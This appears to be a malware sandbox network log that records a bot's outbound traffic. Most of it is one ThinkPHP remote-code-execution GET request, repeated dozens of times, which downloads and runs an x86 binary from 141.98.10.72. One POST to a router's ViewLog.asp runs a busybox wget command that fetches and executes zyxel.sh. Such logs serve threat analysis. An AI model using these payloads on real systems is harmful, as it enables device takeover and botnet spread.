    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: unknownDNS traffic detected: queries for: daisy.ubuntu.com
    Source: unknownHTTP traffic detected: POST /cgi-bin/ViewLog.asp HTTP/1.1Host: 192.168.0.14:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.20.0Content-Length: 227Content-Type: application/x-www-form-urlencodedData Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-type: text/htmlContent-Length: 0Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 14 Feb 2024 08:32:48 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: JAWS/1.0 Feb 20 2019Content-Type: text/html; charset=UTF-8Content-length: 213
